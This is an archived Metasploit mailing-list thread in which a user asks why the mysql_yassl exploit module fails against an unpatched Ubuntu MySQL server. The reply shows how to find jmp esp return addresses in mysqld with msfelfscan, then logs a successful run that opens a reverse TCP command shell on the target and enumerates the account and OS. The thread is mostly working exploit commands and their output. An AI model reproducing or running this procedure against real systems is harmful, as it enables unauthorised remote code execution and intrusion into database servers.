Metasploit mailing list archives
exploit mysql_yassl unsuccesful
From: mc at metasploit.com (MC)
Date: Fri, 6 Mar 2009 09:05:34 -0500 (EST)
yeah, just adjust your ret and you should be good to go: $ ./msfelfscan /usr/sbin/mysqld -j esp | grep fb 0x0837fbb8 push esp; ret 0x0857dffb jmp esp 0x0858fb7f jmp esp 0x085fb710 push esp; retn 0x0000 0x086c76fb jmp esp /// msf exploit(mysql_yassl) > set PAYLOAD linux/x86/shell/reverse_tcp PAYLOAD => linux/x86/shell/reverse_tcp msf exploit(mysql_yassl) > exploit [*] Handler binding to LHOST 0.0.0.0 [*] Started reverse handler [*] Trying target MySQL 5.0.45-Debian_1ubuntu3.1-log... [*] Sending stage (36 bytes) [*] Command shell session 1 opened (192.168.0.188:1975 -> 192.168.0.149:45602) pwd /var/lib/mysql id uid=109(mysql) gid=120(mysql) groups=120(mysql) cat /etc/*release DISTRIB_ID=Ubuntu DISTRIB_RELEASE=7.10 DISTRIB_CODENAME=gutsy DISTRIB_DESCRIPTION="Ubuntu 7.10" On Thu, 5 Mar 2009, MC wrote:
its been a minute since i've written that. but you may need to adjust the return for your target. On Fri, 6 Mar 2009, Lauri Kiiski wrote:Hi I'm unable to get linux/mysql/mysql_yassl working. Is there something basic what I'm missing here? The target is Ubuntu 7.10 without any updates and MySQL 5.0.45-Debian_1ubuntu3-log. SSL is enabled in MySQL and I can connect to it with SSL. My MySQL is different version. Is it a problem? I think I can't get the exact version used in the exploit module since updates are newer. Here are the commands and output of the module. I tried with two different payloads. use linux/mysql/mysql_yassl set rhost target.ip set payload linux/x86/shell/bind_tcp set rhost target.ip msf exploit(mysql_yassl) > exploit [*] Started bind handler [*] Trying target MySQL 5.0.45-Debian_1ubuntu3.1-log... [*] Exploit completed, but no session was created. msf exploit(mysql_yassl) > set payload linux/x86/shell/reverse_tcp set lhost msf.ip msf exploit(mysql_yassl) > exploit [*] Started reverse handler [*] Trying target MySQL 5.0.45-Debian_1ubuntu3.1-log... [*] Exploit completed, but no session was created. msf exploit(mysql_yassl) > _______________________________________________ http://spool.metasploit.com/mailman/listinfo/framework
-- ~ mc
Current thread:
- exploit mysql_yassl unsuccesful Lauri Kiiski (Mar 05)
- exploit mysql_yassl unsuccesful MC (Mar 05)
- exploit mysql_yassl unsuccesful MC (Mar 06)
- exploit mysql_yassl unsuccesful Lauri Kiiski (Mar 30)
- exploit mysql_yassl unsuccesful MC (Mar 30)
- exploit mysql_yassl unsuccesful MC (Mar 06)
- exploit mysql_yassl unsuccesful MC (Mar 05)